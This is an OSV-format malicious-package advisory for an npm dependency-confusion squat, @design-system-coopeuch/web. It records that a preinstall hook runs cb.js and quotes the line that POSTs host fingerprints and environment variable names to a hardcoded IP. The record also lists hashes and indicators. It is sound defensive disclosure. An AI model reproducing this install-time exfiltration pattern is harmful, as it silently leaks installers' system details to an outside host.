{"id":"MAL-2026-3653","summary":"Malicious code in @design-system-coopeuch/web (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (a871445c3913d747a2f1383bcfdac02d6dec26ddb2053260340284cf4ee02233)\nPackage `@design-system-coopeuch/web@999.0.4` is a dependency-confusion squat of an internal-looking scope, published at an inflated 999.x version to override any private registry copy. `package.json` declares a `preinstall` hook that runs `cb.js`, which collects installer host identifiers (`os.hostname()`, cwd, install directory, `id`, `uname -a`, OS release info, and the full list of `process.env` key names) and POSTs them as JSON over cleartext HTTP to a hardcoded bare IP, `http://157.173.126.113:8443/dep-confusion` (cb.js line 20: `hostname: \"157.173.126.113\", port: 8443, path: \"/dep-confusion\", method: \"POST\"`). The beacon fires automatically on `npm install` without user consent. Although the package description self-labels as an \"authorized bug bounty PoC,\" any unintended installer has their host fingerprint exfiltrated to an attacker-controlled endpoint. The combination of internal-scope impersonation, inflated version, and install-time beacon to a bare IP is the canonical dependency-confusion attack shape.\n\n## Source: ossf-package-analysis (e91609499d64cf31c94ddc3047d4c189c64e8e5f09c3da98cb3fec5c05978823)\nThe OpenSSF Package Analysis project identified '@design-system-coopeuch/web' @ 999.0.0 (npm) as malicious.\n\nIt is considered malicious because:\n\n- The package executes one or more commands associated with malicious behavior.\n","modified":"2026-05-15T07:52:17.599724Z","published":"2026-05-13T02:46:17Z","database_specific":{"malicious-packages-origins":[{"source":"ossf-package-analysis","versions":["999.0.0"],"import_time":"2026-05-13T09:07:58.812691011Z","sha256":"e91609499d64cf31c94ddc3047d4c189c64e8e5f09c3da98cb3fec5c05978823","modified_time":"2026-05-13T02:46:17Z"},{"source":"amazon-inspector","versions":["999.0.4"],"import_time":"2026-05-15T07:37:19.848171132Z","id":"IN-MAL-2026-002780","sha256":"a871445c3913d747a2f1383bcfdac02d6dec26ddb2053260340284cf4ee02233","modified_time":"2026-05-14T21:28:49Z"},{"source":"amazon-inspector","versions":["999.0.0"],"import_time":"2026-05-15T07:37:19.664320794Z","id":"IN-MAL-2026-002778","sha256":"a9cb49ff96b31bfe45dc71bbdb2da10deebbce669349ee716dc54ca2bc5730e6","modified_time":"2026-05-14T21:07:29Z"},{"source":"amazon-inspector","versions":["999.0.0"],"import_time":"2026-05-15T07:37:18.776464529Z","id":"IN-MAL-2026-002748","sha256":"c6a5d517f4c553ff117601cad9013ed774327d5054716118f863158b963f4098","modified_time":"2026-05-14T19:25:43Z"},{"source":"amazon-inspector","versions":["999.0.4"],"import_time":"2026-05-15T07:37:18.854288051Z","id":"IN-MAL-2026-002749","sha256":"4490514d2a58551410f3fba0ab3425151aab2ec7bdf0490cbd64629032c839eb","modified_time":"2026-05-14T19:25:44Z"},{"source":"amazon-inspector","versions":["999.0.0"],"import_time":"2026-05-15T07:37:19.708610392Z","id":"IN-MAL-2026-002779","sha256":"9f2dd3bd8d9cb5f43df394f4fd5b3e7673db125dca15b969d6d115cd3f255bca","modified_time":"2026-05-14T21:09:00Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@design-system-coopeuch/web/v/999.0.4"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@design-system-coopeuch/web/v/999.0.0"}],"affected":[{"package":{"name":"@design-system-coopeuch/web","ecosystem":"npm","purl":"pkg:npm/%40design-system-coopeuch/web"},"versions":["999.0.0","999.0.4"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@design-system-coopeuch/web/MAL-2026-3653.json","cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"evidence_files":[{"tlsh":"390175f0b3d9abf035e571a0b0f20400f2a3c8697207b4d057c405f566ce57840322dd","path":"cb.js","sha256":"e0a192b06e2e1f7fe414a639db042f1cc36e0553438d862960d58c45d351383a"},{"tlsh":"c3d0973a0904a43320c807e014744001e260dc2f0100de288bc30068c22a7b3437bb0e","path":"package.json","sha256":"fff99c4797738dbb4fc2967a1d5f2a70444ffceab004b5497e6be5fb4be06da9"}],"package_integrity":[{"hashes":{"sha1":"c22ac630a1390f8b178093865b23e858737a29d2","sha512_sri":"sha512-iMZekSgCa3lCdCzXHw79aDx0QnM5JKARpeVoHRx96rqCM5c7rkb82NyyCvy+QYNj5MYFeGDnFFGjPFykzhgxgA=="},"filename":"web-999.0.4.tgz"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"},{"name":"OpenSSF: Package Analysis","contact":["https://github.com/ossf/package-analysis","https://openssf.slack.com/channels/package_analysis"],"type":"FINDER"}]}